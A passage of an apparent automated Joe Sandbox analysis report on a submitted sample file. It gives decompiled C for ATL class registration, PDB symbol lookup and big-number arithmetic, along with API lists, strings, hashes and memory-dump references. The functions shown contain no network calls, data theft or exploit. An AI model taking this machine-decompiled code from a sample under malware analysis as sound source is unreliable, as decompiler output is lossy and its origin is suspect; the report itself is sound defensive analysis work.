										goto L46;
									}
									_v488 = 0;
									goto L47;
								}
								_v484 = 0;
								goto L48;
							}
							_v444 = 0xd;
							E0094B190( &_v16, __eflags);
							_t184 = _v444;
						} else {
							_v436 = 0;
							E0094B190( &_v16, __eflags);
							_t184 = _v436;
						}
					} else {
						__eflags = 0;
						if(0 == 0) {
							__eflags = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1c2e, 0, "%ls", L"0 && \"Use OBJECT_ENTRY_NON_CREATEABLE_EX macro if you want to register class categories for non creatable objects.\"") - 1;
							if(__eflags == 0) {
								asm("int3");
							}
						}
						_v432 = 0;
						E0094B190( &_v16, __eflags);
						_t184 = _v432;
					}
					goto L60;
				} else {
					_v428 = 0;
					E0094B190( &_v16, _t368);
					_t184 = _v428;
					L60:
					E009D13E0(_t269, _t354, 0x94b0a0, _v456);
					_t186 = _t184;
					_t335 = _t333;
					return E00957280(_t186, _t269, _v8 ^ _t354, _t335, _t352, _t353);
				}
			}










































































                      0x0094a960
                      0x0094a96b
                      0x0094a97b
                      0x0094a97b
                      0x0094a97b
                      0x0094a97d
                      0x0094a984
                      0x0094a987
                      0x0094a994
                      0x0094a999
                      0x0094a99d
                      0x0094a9c5
                      0x0094a9ca
                      0x0094a9cd
                      0x0094a9cf
                      0x0094aa1b
                      0x0094aa20
                      0x0094aa31
                      0x0094aa37
                      0x0094aa3e
                      0x0094aa41
                      0x0094aa45
                      0x0094aa64
                      0x0094aa6e
                      0x0094aa71
                      0x0094aa74
                      0x0094aa77
                      0x00000000
                      0x00000000
                      0x0094aa80
                      0x0094aa85
                      0x0094aa8b
                      0x0094aa91
                      0x0094aa97
                      0x0094aa9a
                      0x0094aa9e
                      0x0094ab76
                      0x0094ab79
                      0x0094abb5
                      0x0094abb8
                      0x0094abd2
                      0x0094abd7
                      0x0094abda
                      0x0094abdd
                      0x0094abdf
                      0x0094abdf
                      0x0094abdd
                      0x0094abe8
                      0x0094abee
                      0x0094ac07
                      0x0094ac0c
                      0x0094ac0e
                      0x0094ac10
                      0x0094ab7b
                      0x0094ab83
                      0x0094ab89
                      0x0094ab9c
                      0x0094aba7
                      0x0094aba9
                      0x0094abab
                      0x0094abab
                      0x0094ac15
                      0x0094ac1b
                      0x00000000
                      0x0094ac1b
                      0x0094aaa7
                      0x0094aaaa
                      0x0094aae9
                      0x0094aaec
                      0x0094ab06
                      0x0094ab0b
                      0x0094ab0e
                      0x0094ab11
                      0x0094ab13
                      0x0094ab13
                      0x0094ab11
                      0x0094ab1c
                      0x0094ab22
                      0x0094ab3d
                      0x0094ab40
                      0x0094ab42
                      0x0094ab49
                      0x0094aaac
                      0x0094aab4
                      0x0094aaba
                      0x0094aad3
                      0x0094aad8
                      0x0094aada
                      0x0094aae1
                      0x0094aae1
                      0x0094ab4c
                      0x0094ab50
                      0x00000000
                      0x0094ab52
                      0x0094ab55
                      0x0094ab5e
                      0x0094ab63
                      0x00000000
                      0x0094ab63
                      0x0094ab50
                      0x0094ac23
                      0x0094ac27
                      0x0094b056
                      0x0094b056
                      0x0094b063
                      0x0094b068
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0094ac2d
                      0x0094ac2d
                      0x0094ac2d
                      0x0094ac31
                      0x0094ac3c
                      0x0094ac42
                      0x0094ac44
                      0x0094ac49
                      0x0094ac4b
                      0x0094ac59
                      0x0094ac4d
                      0x0094ac4d
                      0x0094ac4d
                      0x0094ac69
                      0x0094ac6f
                      0x0094ac76
                      0x0094ac90
                      0x0094ac95
                      0x0094ac98
                      0x0094ac9b
                      0x0094ac9d
                      0x0094ac9d
                      0x0094ac9b
                      0x0094ac9e
                      0x0094aca5
                      0x00000000
                      0x00000000
                      0x0094acc4
                      0x0094acc6
                      0x00000000
                      0x00000000
                      0x0094accc
                      0x0094acdb
                      0x0094ace1
                      0x0094aceb
                      0x0094acfb
                      0x0094ad06
                      0x0094ad0c
                      0x0094ad13
                      0x0094ad24
                      0x0094ad36
                      0x0094ad4c
                      0x0094ad51
                      0x0094ad54
                      0x0094ad56
                      0x0094ad67
                      0x0094ad71
                      0x0094add6
                      0x0094ade8
                      0x0094adee
                      0x0094ae03
                      0x0094ae0f
                      0x0094ae15
                      0x0094ae1b
                      0x0094ae21
                      0x0094ae27
                      0x0094ae2d
                      0x0094ae34
                      0x0094ae4b
                      0x0094ae66
                      0x0094ae7f
                      0x0094ae84
                      0x0094ae92
                      0x0094ae9f
                      0x0094aea4
                      0x0094aed1
                      0x0094aed7
                      0x0094aede
                      0x0094aee0
                      0x0094af09
                      0x0094af0f
                      0x0094af16
                      0x0094af22
                      0x0094af27
                      0x0094af2e
                      0x0094af30
                      0x0094af37
                      0x0094af46
                      0x0094af46
                      0x0094af37
                      0x0094af2e
                      0x0094af5c
                      0x0094af70
                      0x0094af77
                      0x0094af90
                      0x0094af95
                      0x0094afbb
                      0x0094afc1
                      0x0094afc8
                      0x0094afca
                      0x0094afda
                      0x0094aff3
                      0x0094aff9
                      0x0094b000
                      0x0094b00c
                      0x0094b011
                      0x0094b018
                      0x0094b01a
                      0x0094b021
                      0x0094b030
                      0x0094b030
                      0x0094b021
                      0x0094b018
                      0x0094b03b
                      0x0094b046
                      0x0094b046
                      0x0094b051
                      0x00000000
                      0x0094b051
                      0x0094ad7a
                      0x0094ad7f
                      0x0094ad85
                      0x0094ad87
                      0x00000000
                      0x00000000
                      0x0094ad92
                      0x0094ad9e
                      0x0094ada3
                      0x0094adbc
                      0x0094adc1
                      0x0094adce
                      0x00000000
                      0x0094adce
                      0x0094ad58
                      0x00000000
                      0x0094ad58
                      0x0094ad15
                      0x00000000
                      0x0094ad15
                      0x0094aca7
                      0x0094acb4
                      0x0094acb9
                      0x0094aa47
                      0x0094aa47
                      0x0094aa54
                      0x0094aa59
                      0x0094aa59
                      0x0094a9d1
                      0x0094a9d1
                      0x0094a9d3
                      0x0094a9f5
                      0x0094a9f8
                      0x0094a9fa
                      0x0094a9fa
                      0x0094a9f8
                      0x0094a9fb
                      0x0094aa08
                      0x0094aa0d
                      0x0094aa0d
                      0x00000000
                      0x0094a99f
                      0x0094a99f
                      0x0094a9ac
                      0x0094a9b1
                      0x0094b06e
                      0x0094b07e
                      0x0094b083
                      0x0094b084
                      0x0094b09a
                      0x0094b09a

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Module
                      • String ID: $%ls$0 && "Use OBJECT_ENTRY_NON_CREATEABLE_EX macro if you want to register class categories for non creatable objects."$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$CLSID\$\Implemented Categories$\Required Categories$__atl_condVal$pEntry->iType == 2
                      • API String ID: 193471262-2261637480
                      • Opcode ID: 4bf698b0ba7bb9dd17ad4d1e52d680f2214ae2abff5cec000cc0b40d3f0993bf
                      • Instruction ID: ed6a9629bb37acb8dea0a48933a0daf796113d4cfac0e1953b70c756e87fcb8f
                      • Opcode Fuzzy Hash: 4bf698b0ba7bb9dd17ad4d1e52d680f2214ae2abff5cec000cc0b40d3f0993bf
                      • Instruction Fuzzy Hash: A5123B71D402289FDB24EB54DC52FEEB3B5AF98704F1081D9E60967291DB70AE84CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009D20D0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 310memorylibraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 40%
                      			E009D20D0(intOrPtr _a4, short* _a8, char _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed short _v8;
				long _v12;
				void* _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				char _v32;
				void* _v36;
				long _v40;
				char _v44;
				char _v48;
				char _v52;
				struct _MEMORY_BASIC_INFORMATION _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t80;
				void* _t81;
				struct HINSTANCE__* _t83;
				void* _t135;
				void* _t139;
				signed int _t140;
				void* _t146;
				void* _t149;
				void* _t151;
				intOrPtr _t155;
				intOrPtr* _t156;
				void* _t174;
				intOrPtr _t181;
				intOrPtr* _t188;
				intOrPtr _t190;
				signed int _t192;
				signed int _t195;
				intOrPtr* _t204;
				void* _t212;
				void* _t214;
				intOrPtr* _t215;
				signed int _t228;

				 *_a16 = 0;
				_t212 = _a4 - 1;
				 *_a8 = 0;
				if(VirtualQuery(_t212,  &_v80, 0x1c) == 0 || E009D24B0(_v80.AllocationBase, _a20, _a24) == 0) {
					L45:
					return 0;
				} else {
					_t80 = _v80.AllocationBase;
					if( *_t80 != 0x5a4d) {
						goto L45;
					} else {
						_t155 =  *((intOrPtr*)(_t80 + 0x3c));
						if(_t155 <= 0) {
							goto L45;
						} else {
							_t156 = _t155 + _t80;
							if( *_t156 != 0x4550) {
								goto L45;
							} else {
								_t214 = _t212 - _t80;
								_t195 =  *(_t156 + 6) & 0x0000ffff;
								_t190 = ( *(_t156 + 0x14) & 0x0000ffff) + 0x20;
								_t149 = 0;
								_t81 = 0;
								if(_t195 != 0) {
									_t188 = _t156 + _t190;
									do {
										_t190 =  *((intOrPtr*)(_t188 + 4));
										if(_t214 < _t190) {
											goto L9;
										} else {
											_t149 = _t214 - _t190;
											if(_t214 >=  *_t188) {
												goto L9;
											}
										}
										goto L10;
										L9:
										_t81 = _t81 + 1;
										_t188 = _t188 + 0x28;
									} while (_t81 < _t195);
								}
								L10:
								if(_t81 == _t195) {
									goto L45;
								} else {
									_v16 = _t81 + 1;
									if( *0xb337c9 != 0) {
										_t83 =  *0xb337c4;
										goto L16;
									} else {
										if( *0xb337c4 != 0) {
											goto L45;
										} else {
											_t83 = E009D1C50(_t149, _t190, _t195, _t214);
											 *0xb337c4 = _t83;
											if(_t83 == 0) {
												goto L45;
											} else {
												 *0xb337c9 = 1;
												L16:
												_t215 = GetProcAddress(_t83, "PDBOpenValidate5");
												if(_t215 == 0) {
													goto L45;
												} else {
													 *0x9d62b0(_a20, 0, 0, 0,  &_v52, 0, 0,  &_v28);
													if( *_t215() == 0) {
														goto L45;
													} else {
														_v12 = 0;
														_v40 = 0;
														 *0x9d62b0();
														if( *((intOrPtr*)( *((intOrPtr*)( *_v28))))() == 0x1329141) {
															 *0x9d62b0(0, "r",  &_v36);
															if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x1c))))() != 0) {
																 *0x9d62b0(_v16, _t149,  &_v24, 0, 0, 0);
																if( *((intOrPtr*)( *((intOrPtr*)( *_v36 + 0x20))))() != 0) {
																	 *0x9d62b0( &_v12);
																	if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x68))))() != 0) {
																		_t204 = _v12;
																		if(_t204 != 0) {
																			 *0x9d62b0();
																			if( *((intOrPtr*)( *((intOrPtr*)( *_t204 + 8))))() == 0) {
																				L29:
																				_t174 = 0;
																				goto L30;
																			} else {
																				while(1) {
																					 *0x9d62b0(0,  &_v32,  &_v8,  &_v44,  &_v20, 0);
																					if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0xc))))() == 0) {
																						goto L31;
																					}
																					if((_v8 & 0x0000ffff) != _v16) {
																						L28:
																						 *0x9d62b0();
																						if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))() != 0) {
																							continue;
																						} else {
																							goto L29;
																						}
																					} else {
																						_t181 = _v32;
																						if(_t181 > _t149 || _t149 >= _v44 + _t181) {
																							goto L28;
																						} else {
																							_t228 = _v20;
																							if(_t228 == 0 || _t228 >= 0x1fffffff) {
																								goto L31;
																							} else {
																								_t135 = HeapAlloc(GetProcessHeap(), 0, _t228 << 3);
																								_v16 = _t135;
																								if(_t135 == 0) {
																									goto L31;
																								} else {
																									 *0x9d62b0( &_v48, 0, 0, 0,  &_v20, _t135);
																									_t139 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0xc))))();
																									_t174 = _v16;
																									if(_t139 == 0) {
																										L30:
																										HeapFree(GetProcessHeap(), 0, _t174);
																										goto L31;
																									} else {
																										_t151 = _t149 - _v32;
																										if(_t151 >=  *_t174) {
																											_t192 = _v20;
																											_t140 = 1;
																											if(_t192 > 1) {
																												while(_t151 >=  *((intOrPtr*)(_t174 + _t140 * 8))) {
																													_t140 = _t140 + 1;
																													if(_t140 < _t192) {
																														continue;
																													}
																													goto L43;
																												}
																											}
																											L43:
																											 *_a16 =  *(_t174 + _t140 * 8 - 4) & 0x00ffffff;
																											 *0x9d62b0(_v48, _a8,  &_a12, 0, 0, 0);
																											_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x70))))();
																											_t174 = _v16;
																											if(_t146 != 0) {
																												_v40 = 1;
																											}
																										}
																										goto L30;
																									}
																									goto L34;
																								}
																							}
																							goto L46;
																						}
																					}
																					goto L31;
																				}
																			}
																			L31:
																			 *0x9d62b0();
																			 *((intOrPtr*)( *((intOrPtr*)( *_v12))))();
																		}
																	}
																	 *0x9d62b0();
																	 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x40))))();
																}
																 *0x9d62b0();
																 *((intOrPtr*)( *((intOrPtr*)( *_v36 + 0x38))))();
															}
														}
														L34:
														 *0x9d62b0();
														 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x2c))))();
														return _v40;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L46:
			}









































                      0x009d20e0
                      0x009d20e6
                      0x009d20ed
                      0x009d20fd
                      0x009d2447
                      0x009d244f
                      0x009d211c
                      0x009d211c
                      0x009d2127
                      0x00000000
                      0x009d212d
                      0x009d212d
                      0x009d2132
                      0x00000000
                      0x009d2138
                      0x009d2138
                      0x009d2140
                      0x00000000
                      0x009d2146
                      0x009d214a
                      0x009d214c
                      0x009d2150
                      0x009d2153
                      0x009d2155
                      0x009d2159
                      0x009d215b
                      0x009d2160
                      0x009d2160
                      0x009d2165
                      0x00000000
                      0x009d2167
                      0x009d2169
                      0x009d216d
                      0x00000000
                      0x00000000
                      0x009d216d
                      0x00000000
                      0x009d216f
                      0x009d216f
                      0x009d2170
                      0x009d2173
                      0x009d2160
                      0x009d2177
                      0x009d2179
                      0x00000000
                      0x009d217f
                      0x009d2187
                      0x009d218a
                      0x009d21b4
                      0x00000000
                      0x009d218c
                      0x009d2193
                      0x00000000
                      0x009d2199
                      0x009d2199
                      0x009d219e
                      0x009d21a5
                      0x00000000
                      0x009d21ab
                      0x009d21ab
                      0x009d21b9
                      0x009d21c5
                      0x009d21c9
                      0x00000000
                      0x009d21cf
                      0x009d21e6
                      0x009d21f3
                      0x00000000
                      0x009d21f9
                      0x009d21fc
                      0x009d2203
                      0x009d2210
                      0x009d221f
                      0x009d223a
                      0x009d2246
                      0x009d2264
                      0x009d2270
                      0x009d2284
                      0x009d2290
                      0x009d2296
                      0x009d229b
                      0x009d22a8
                      0x009d22b4
                      0x009d2317
                      0x009d2317
                      0x00000000
                      0x00000000
                      0x009d22b6
                      0x009d22d4
                      0x009d22e0
                      0x00000000
                      0x00000000
                      0x009d22e9
                      0x009d22ff
                      0x009d2309
                      0x009d2315
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009d22eb
                      0x009d22eb
                      0x009d22f0
                      0x00000000
                      0x009d2382
                      0x009d2382
                      0x009d2387
                      0x00000000
                      0x009d2391
                      0x009d239e
                      0x009d23a4
                      0x009d23a9
                      0x00000000
                      0x009d23af
                      0x009d23c8
                      0x009d23d0
                      0x009d23d2
                      0x009d23d7
                      0x009d2319
                      0x009d2323
                      0x00000000
                      0x009d23dd
                      0x009d23dd
                      0x009d23e2
                      0x009d23e8
                      0x009d23eb
                      0x009d23f2
                      0x009d23f4
                      0x009d23f9
                      0x009d23fc
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009d23fc
                      0x009d23f4
                      0x009d23fe
                      0x009d2411
                      0x009d2426
                      0x009d242e
                      0x009d2430
                      0x009d2435
                      0x009d243b
                      0x009d243b
                      0x009d2435
                      0x00000000
                      0x009d23e2
                      0x00000000
                      0x009d23d7
                      0x009d23a9
                      0x00000000
                      0x009d2387
                      0x009d22f0
                      0x00000000
                      0x009d22e9
                      0x009d22b6
                      0x009d2329
                      0x009d2332
                      0x009d233a
                      0x009d233a
                      0x009d229b
                      0x009d2346
                      0x009d234e
                      0x009d234e
                      0x009d235a
                      0x009d2362
                      0x009d2362
                      0x009d2246
                      0x009d2364
                      0x009d236e
                      0x009d2376
                      0x009d2381
                      0x009d2381
                      0x009d21f3
                      0x009d21c9
                      0x009d21a5
                      0x009d2193
                      0x009d218a
                      0x009d2179
                      0x009d2140
                      0x009d2132
                      0x009d2127
                      0x00000000

                      APIs
                      • VirtualQuery.KERNEL32(?,?,0000001C,00000000,?,Runtime Check Error. Unable to display RTC Message.), ref: 009D20F5
                        • Part of subcall function 009D24B0: GetModuleFileNameW.KERNEL32(?,?,009D2111,?,009D2111,?,?,009D1975), ref: 009D24BF
                      • GetProcAddress.KERNEL32(?,PDBOpenValidate5), ref: 009D21BF
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009D231C
                      • HeapFree.KERNEL32(00000000), ref: 009D2323
                      • GetProcessHeap.KERNEL32 ref: 009D2394
                      • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 009D239E
                      Strings
                      • Runtime Check Error. Unable to display RTC Message., xrefs: 009D20DB
                      • PDBOpenValidate5, xrefs: 009D21B9
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Heap$Process$AddressAllocFileFreeModuleNameProcQueryVirtual
                      • String ID: PDBOpenValidate5$Runtime Check Error. Unable to display RTC Message.
                      • API String ID: 3872449310-425978220
                      • Opcode ID: e8776431c6581f906e528d36f46a09651007088e3cd405ba4206ecc08ef792ca
                      • Instruction ID: 8fa39a5ed7b0ef612f08e89b22046acb9d2bb61b5aad2babca76bca142e9bafb
                      • Opcode Fuzzy Hash: e8776431c6581f906e528d36f46a09651007088e3cd405ba4206ecc08ef792ca
                      • Instruction Fuzzy Hash: 11B19F35A402199FCF15DFA4C844BAEB7BAFF98710F188056EA11E7390DB75AD42CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009BAC80 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 602COMMONCrypto
                      Download Yara Rule
                      C-Code - Quality: 89%
                      			E009BAC80(void* __ebx, signed int* _a4, signed int* _a8) {
				signed int _v8;
				char _v472;
				char _v936;
				char _v1400;
				signed int _v1404;
				signed int _v1408;
				signed int _v1412;
				signed int _v1416;
				signed int _v1420;
				signed int _v1424;
				signed int _v1428;
				signed int _v1432;
				signed int _v1436;
				signed int _v1440;
				signed int _v1444;
				signed int _v1448;
				signed int _v1452;
				signed int _v1456;
				signed int _v1460;
				signed int _v1464;
				signed int _v1468;
				signed int _v1472;
				signed int _v1476;
				signed int _v1480;
				intOrPtr _v1484;
				signed int _v1488;
				signed int _v1492;
				signed int _v1496;
				signed int _v1500;
				signed int _v1504;
				signed int _v1508;
				signed int _v1512;
				signed int _v1516;
				signed int _v1520;
				signed int _v1524;
				signed int _v1528;
				signed int _v1532;
				signed int _v1536;
				intOrPtr _v1540;
				signed int _v1544;
				signed int _v1548;
				signed int _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				signed int _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				void* __edi;
				void* __esi;
				signed int _t401;
				signed int* _t408;
				signed int _t410;
				signed int _t414;
				signed int _t419;
				signed int _t421;
				signed int _t426;
				signed int _t437;
				void* _t442;
				signed int _t453;
				void* _t455;
				intOrPtr _t466;
				signed int _t468;
				signed int _t480;
				signed int* _t491;
				void* _t496;
				void* _t498;
				signed int* _t508;
				void* _t514;
				void* _t515;
				signed int _t519;
				signed int _t523;
				signed int _t529;
				signed int* _t534;
				signed int _t554;
				signed int _t564;
				signed int _t568;
				signed int* _t588;
				signed int _t590;
				signed int _t607;
				signed int _t623;
				signed int _t626;
				signed int _t628;
				signed int _t634;
				intOrPtr _t635;
				signed int _t647;
				intOrPtr _t650;
				signed int _t660;
				intOrPtr _t661;
				signed int* _t662;
				signed int _t666;
				signed int _t669;
				signed int _t670;
				intOrPtr _t674;
				signed int _t687;
				signed int _t688;
				intOrPtr _t697;
				intOrPtr _t699;
				signed int _t703;
				void* _t714;
				signed int* _t720;
				void* _t721;
				signed int* _t727;
				signed int _t732;
				signed int _t734;
				void* _t735;
				void* _t736;

				_t515 = __ebx;
				_t732 = _t734;
				_t735 = _t734 - 0x630;
				_t401 =  *0xa0600c; // 0x5d529087
				_v8 = _t401 ^ _t732;
				if( *_a4 != 0) {
					__eflags =  *_a8;
					if( *_a8 != 0) {
						_v1420 =  *_a4 - 1;
						_t519 =  *_a8 - 1;
						__eflags = _t519;
						_v1496 = _t519;
						if(_t519 != 0) {
							__eflags = _v1496 - _v1420;
							if(_v1496 <= _v1420) {
								_v1408 = _v1496 + 1;
								_v1500 = _v1420 - _v1496;
								_v1456 = _v1500;
								_v1432 = _v1420;
								while(1) {
									__eflags = _v1432 - _v1500;
									if(_v1432 < _v1500) {
										break;
									}
									_t623 = _v1432 - _v1500;
									_t408 = _a8;
									_t523 = _v1432;
									_t720 = _a4;
									_t124 = _t623 * 4; // 0xfff15885
									__eflags =  *((intOrPtr*)(_t408 + _t124 + 4)) -  *((intOrPtr*)(_t720 + 4 + _t523 * 4));
									if( *((intOrPtr*)(_t408 + _t124 + 4)) ==  *((intOrPtr*)(_t720 + 4 + _t523 * 4))) {
										_t626 = _v1432 - 1;
										__eflags = _t626;
										_v1432 = _t626;
										continue;
									} else {
										_t410 = _v1432 - _v1500;
										_t588 = _a8;
										_t688 = _v1432;
										_t727 = _a4;
										_t135 = _t410 * 4; // 0xfff15885
										__eflags =  *((intOrPtr*)(_t588 + _t135 + 4)) -  *((intOrPtr*)(_t727 + 4 + _t688 * 4));
										if( *((intOrPtr*)(_t588 + _t135 + 4)) <  *((intOrPtr*)(_t727 + 4 + _t688 * 4))) {
											_t590 = _v1456 + 1;
											__eflags = _t590;
											_v1456 = _t590;
										}
									}
									L35:
									__eflags = _v1456;
									if(__eflags != 0) {
										_v1440 = _a8[_v1408];
										_t628 = _v1408;
										_t413 = _a8;
										_t151 = _t628 * 4; // 0x55d
										_v1460 =  *((intOrPtr*)(_a8 + _t151 - 4));
										_push(_v1440);
										_t414 = E009BAC40(_t413,  *((intOrPtr*)(_a8 + _t151 - 4)), __eflags);
										_t736 = _t735 + 4;
										_v1436 = _t414;
										_v1504 = 0x20 - _v1436;
										__eflags = _v1436;
										if(_v1436 > 0) {
											_v1440 = _v1440 << _v1436 | _v1460 >> _v1504;
											_v1460 = _v1460 << _v1436;
											__eflags = _v1408 - 2;
											if(_v1408 > 2) {
												_t171 = _v1408 * 4; // 0xe851ffff
												_t687 =  *(_a8 + _t171 - 8) >> _v1504 | _v1460;
												__eflags = _t687;
												_v1460 = _t687;
											}
										}
										_v1524 = 0;
										_v1520 = 0;
										_v1404 = _v1456;
										while(1) {
											_t529 = _v1404 - 1;
											__eflags = _t529;
											_v1404 = _t529;
											if(_t529 < 0) {
												break;
											}
											__eflags = _v1404 + _v1408 - _v1420;
											if(_v1404 + _v1408 > _v1420) {
												_v1532 = 0;
											} else {
												_v1532 =  *((intOrPtr*)(_a4 + 4 + (_v1404 + _v1408) * 4));
											}
											_v1540 = _v1532;
											_v1488 = _a4[_v1404 + _v1408];
											_v1484 = 0;
											 *((intOrPtr*)(_t732 + 0xbad5e1)) = _v1540;
											_v1464 =  *((intOrPtr*)(_a4 + (_v1404 + _v1408) * 4 - 4));
											__eflags = _v1436;
											if(_v1436 > 0) {
												_t674 = _v1484;
												_v1488 = E009CEC00(_v1488, _v1436, _t674) | _v1464 >> _v1504;
												_v1484 = _t674;
												_v1464 = _v1464 << _v1436;
												__eflags = _v1404 + _v1408 - 3;
												if(_v1404 + _v1408 >= 3) {
													_t480 =  *(_a4 + (_v1404 + _v1408) * 4 - 8) >> _v1504 | _v1464;
													__eflags = _t480;
													_v1464 = _t480;
												}
											}
											_v1416 = E009CEC20(_v1488, _v1484, _v1440, 0);
											_v1412 = 0;
											_v1476 = E009CEC90(_v1488, _v1484, _v1440, 0);
											_v1472 = 0;
											__eflags = _v1412;
											if(_v1412 > 0) {
												L50:
												_t647 = _v1440;
												asm("sbb esi, 0x0");
												_t437 = E009CED40(_t647, 0, _v1416 - 0xffffffff, _v1412) + _v1476;
												__eflags = _t437;
												asm("adc edx, [ebp-0x5bc]");
												_v1476 = _t437;
												_v1472 = _t647;
												_v1416 = 0xffffffff;
												_v1412 = 0;
											} else {
												__eflags = _v1416 - 0xffffffff;
												if(_v1416 <= 0xffffffff) {
													goto L51;
												} else {
													goto L50;
												}
												while(1) {
													L51:
													__eflags = _v1472;
													if(__eflags > 0) {
														break;
													}
													if(__eflags < 0) {
														L54:
														_t669 = _v1416;
														_t466 = E009CED40(_t669, _v1412, _v1460, 0);
														_t670 = _v1472;
														_t468 = E009CEC00(_v1476, 0x20, _t670);
														_v1588 = _t466;
														_v1584 = _t669;
														_v1568 = _t468 | _v1464;
														_v1564 = _t670;
														__eflags = _v1584 - _v1564;
														if(__eflags >= 0) {
															if(__eflags > 0) {
																L57:
																asm("sbb edx, 0x0");
																_v1416 = _v1416 - 1;
																asm("adc ecx, [ebp-0x5bc]");
																_v1476 = _v1440 + _v1476;
																_v1472 = 0;
																continue;
															} else {
																__eflags = _v1588 - _v1568;
																if(_v1588 > _v1568) {
																	goto L57;
																}
															}
														}
													} else {
														__eflags = _v1476 - 0xffffffff;
														if(_v1476 <= 0xffffffff) {
															goto L54;
														}
													}
													break;
												}
												__eflags = _v1412;
												if(_v1412 > 0) {
													L60:
													_v1428 = 0;
													_v1424 = 0;
													_v1444 = 0;
													while(1) {
														__eflags = _v1444 - _v1408;
														if(_v1444 >= _v1408) {
															break;
														}
														_t290 = _v1444 * 4; // 0xfff15885
														_t660 = _v1416;
														_t455 = E009BBCE0(_t660, _v1412,  *((intOrPtr*)(_a8 + _t290 + 4)));
														_t736 = _t736 + 0xc;
														asm("adc edx, [ebp-0x58c]");
														_v1428 = _t455 + _v1428;
														_v1424 = _t660;
														_v1536 = _v1428;
														_t661 = _v1424;
														_v1428 = E009CEEF0(_v1428, 0x20, _t661);
														_v1424 = _t661;
														_t564 = _v1404 + _v1444;
														_t662 = _a4;
														__eflags =  *((intOrPtr*)(_t662 + 4 + _t564 * 4)) - _v1536;
														if( *((intOrPtr*)(_t662 + 4 + _t564 * 4)) < _v1536) {
															_t568 = _v1428 + 1;
															__eflags = _t568;
															asm("adc edx, 0x0");
															_v1428 = _t568;
														}
														 *((intOrPtr*)(_a4 + 4 + (_v1404 + _v1444) * 4)) =  *((intOrPtr*)(_a4 + 4 + (_v1404 + _v1444) * 4)) - _v1536;
														_t666 = _v1444 + 1;
														__eflags = _t666;
														_v1444 = _t666;
													}
													_v1576 = _v1540;
													_v1572 = 0;
													__eflags = _v1572 - _v1424;
													if(__eflags <= 0) {
														if(__eflags < 0) {
															L69:
															_v1528 = 0;
															_v1468 = 0;
															while(1) {
																__eflags = _v1468 - _v1408;
																if(_v1468 >= _v1408) {
																	break;
																}
																_t349 = _v1468 * 4; // 0xfff15885
																asm("adc edx, edi");
																asm("adc edx, eax");
																_v1560 =  *((intOrPtr*)(_a4 + 4 + (_v1404 + _v1468) * 4)) +  *((intOrPtr*)(_a8 + _t349 + 4)) + _v1528;
